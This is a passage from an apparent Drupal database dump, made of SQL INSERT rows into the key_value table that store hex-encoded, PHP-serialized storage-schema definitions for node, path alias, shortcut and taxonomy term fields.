e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32303a226669656c645f746167735f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32303a226669656c645f746167735f7461726765745f6964223b613a313a7b693a303b733a32303a226669656c645f746167735f7461726765745f6964223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.langcode', 0x613a343a7b733a343a226e6f6465223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31333a226e6f64655f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32303a226e6f64655f6669656c645f5f6c616e67636f6465223b613a313a7b693a303b733a383a226c616e67636f6465223b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.nid', 0x613a343a7b733a343a226e6f6465223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226e6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226e6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31333a226e6f64655f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226e6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a226e6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.promote', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a2270726f6d6f7465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a2270726f6d6f7465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.revision_default', 0x613a313a7b733a31333a226e6f64655f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.revision_log', 0x613a313a7b733a31333a226e6f64655f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31323a227265766973696f6e5f6c6f67223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.revision_timestamp', 0x613a313a7b733a31333a226e6f64655f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31383a227265766973696f6e5f74696d657374616d70223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.revision_translation_affected', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.revision_uid', 0x613a313a7b733a31333a226e6f64655f7265766973696f6e223b613a333a7b733a363a226669656c6473223b613a313a7b733a31323a227265766973696f6e5f756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a33353a226e6f64655f6669656c645f5f7265766973696f6e5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a31323a227265766973696f6e5f756964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32343a226e6f64655f6669656c645f5f7265766973696f6e5f756964223b613a323a7b733a353a227461626c65223b733a353a227573657273223b733a373a22636f6c756d6e73223b613a313a7b733a31323a227265766973696f6e5f756964223b733a333a22756964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.status', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.sticky', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737469636b79223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737469636b79223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.title', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a227469746c65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a227469746c65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.type', 0x613a323a7b733a343a226e6f6465223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2274797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32373a226e6f64655f6669656c645f5f747970655f5f7461726765745f6964223b613a313a7b693a303b733a343a2274797065223b7d7d7d733a31353a226e6f64655f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2274797065223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32373a226e6f64655f6669656c645f5f747970655f5f7461726765745f6964223b613a313a7b693a303b733a343a2274797065223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.uid', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32363a226e6f64655f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a323a7b733a363a226669656c6473223b613a313a7b733a333a22756964223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a32363a226e6f64655f6669656c645f5f7569645f5f7461726765745f6964223b613a313a7b693a303b733a333a22756964223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.uuid', 0x613a313a7b733a343a226e6f6465223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32333a226e6f64655f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.vid', 0x613a343a7b733a343a226e6f6465223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31333a226e6f64655f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a333a22766964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.entity_schema_data', 0x613a323a7b733a31303a22706174685f616c696173223b613a333a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a323a226964223b7d733a373a22696e6465786573223b613a323a7b733a33363a22706174685f616c6961735f5f616c6961735f6c616e67636f64655f69645f737461747573223b613a343a7b693a303b733a353a22616c696173223b693a313b733a383a226c616e67636f6465223b693a323b733a323a226964223b693a333b733a363a22737461747573223b7d733a33353a22706174685f616c6961735f5f706174685f6c616e67636f64655f69645f737461747573223b613a343a7b693a303b733a343a2270617468223b693a313b733a383a226c616e67636f6465223b693a323b733a323a226964223b693a333b733a363a22737461747573223b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32333a22706174685f616c6961735f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a373a22696e6465786573223b613a313a7b733a31343a22706174685f616c6961735f5f6964223b613a313a7b693a303b733a323a226964223b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.alias', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a22616c696173223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a22616c696173223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.id', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.langcode', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.path', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a2270617468223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a343a2270617468223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.revision_default', 0x613a313a7b733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.revision_id', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.status', 0x613a323a7b733a31303a22706174685f616c696173223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a22706174685f616c6961735f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22737461747573223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'path_alias.field_schema_data.uuid', 0x613a313a7b733a31303a22706174685f616c696173223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32393a22706174685f616c6961735f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.entity_schema_data', 0x613a323a7b733a383a2273686f7274637574223b613a313a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a323a226964223b7d7d733a31393a2273686f72746375745f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a323a226964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a34303a2273686f72746375745f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a323a226964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.default_langcode', 0x613a313a7b733a31393a2273686f72746375745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.id', 0x613a323a7b733a383a2273686f7274637574223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a363a2273657269616c223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a2273686f72746375745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a323a226964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.langcode', 0x613a323a7b733a383a2273686f7274637574223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a2273686f72746375745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a383a226c616e67636f6465223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.link', 0x613a313a7b733a31393a2273686f72746375745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a333a7b733a393a226c696e6b5f5f757269223b613a343a7b733a31313a226465736372697074696f6e223b733a32303a2254686520555249206f6620746865206c696e6b2e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a323034383b733a383a226e6f74206e756c6c223b623a303b7d733a31313a226c696e6b5f5f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a31343a22546865206c696e6b20746578742e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d733a31333a226c696e6b5f5f6f7074696f6e73223b613a353a7b733a31313a226465736372697074696f6e223b733a34313a2253657269616c697a6564206172726179206f66206f7074696f6e7320666f7220746865206c696e6b2e223b733a343a2274797065223b733a343a22626c6f62223b733a343a2273697a65223b733a333a22626967223b733a393a2273657269616c697a65223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a373a22696e6465786573223b613a313a7b733a32353a2273686f72746375745f6669656c645f5f6c696e6b5f5f757269223b613a313a7b693a303b613a323a7b693a303b733a393a226c696e6b5f5f757269223b693a313b693a33303b7d7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.shortcut_set', 0x613a323a7b733a383a2273686f7274637574223b613a323a7b733a363a226669656c6473223b613a313a7b733a31323a2273686f72746375745f736574223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33393a2273686f72746375745f6669656c645f5f73686f72746375745f7365745f5f7461726765745f6964223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d7d7d733a31393a2273686f72746375745f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a31323a2273686f72746375745f736574223b613a343a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a33393a2273686f72746375745f6669656c645f5f73686f72746375745f7365745f5f7461726765745f6964223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.title', 0x613a313a7b733a31393a2273686f72746375745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a353a227469746c65223b613a343a7b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3235353b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'shortcut.field_schema_data.uuid', 0x613a313a7b733a383a2273686f7274637574223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32373a2273686f72746375745f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'shortcut.field_schema_data.weight', 0x613a313a7b733a31393a2273686f72746375745f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a363a22776569676874223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a303b733a343a2273697a65223b733a363a226e6f726d616c223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.entity_schema_data', 0x613a353a7b733a31383a227461786f6e6f6d795f7465726d5f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a333a22746964223b7d733a31313a22756e69717565206b657973223b613a313a7b733a32363a227461786f6e6f6d795f7465726d5f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a373a22696e6465786573223b613a313a7b733a31383a227461786f6e6f6d795f7465726d5f5f746964223b613a313a7b693a303b733a333a22746964223b7d7d7d733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a22746964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a353a7b733a34353a227461786f6e6f6d795f7465726d5f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a22746964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d733a32363a227461786f6e6f6d795f7465726d5f5f7265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32353a227461786f6e6f6d795f7465726d5f5f7374617475735f766964223b613a333a7b693a303b733a363a22737461747573223b693a313b733a333a22766964223b693a323b733a333a22746964223b7d733a31393a227461786f6e6f6d795f7465726d5f5f74726565223b613a333a7b693a303b733a333a22766964223b693a313b733a363a22776569676874223b693a323b733a343a226e616d65223b7d733a32333a227461786f6e6f6d795f7465726d5f5f7669645f6e616d65223b613a323a7b693a303b733a333a22766964223b693a313b733a343a226e616d65223b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a31313a227265766973696f6e5f6964223b693a313b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a313a7b733a34353a227461786f6e6f6d795f7465726d5f5f69645f5f64656661756c745f6c616e67636f64655f5f6c616e67636f6465223b613a333a7b693a303b733a333a22746964223b693a313b733a31363a2264656661756c745f6c616e67636f6465223b693a323b733a383a226c616e67636f6465223b7d7d7d733a31343a227461786f6e6f6d795f696e646578223b613a323a7b733a31313a227072696d617279206b6579223b613a323a7b693a303b733a333a226e6964223b693a313b733a333a22746964223b7d733a373a22696e6465786573223b613a313a7b733a393a227465726d5f6e6f6465223b613a343a7b693a303b733a333a22746964223b693a313b733a363a22737461747573223b693a323b733a363a22737469636b79223b693a333b733a373a2263726561746564223b7d7d7d7d),
('entity.storage_schema.sql', 'taxonomy_term.field_schema_data.changed', 0x613a323a7b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
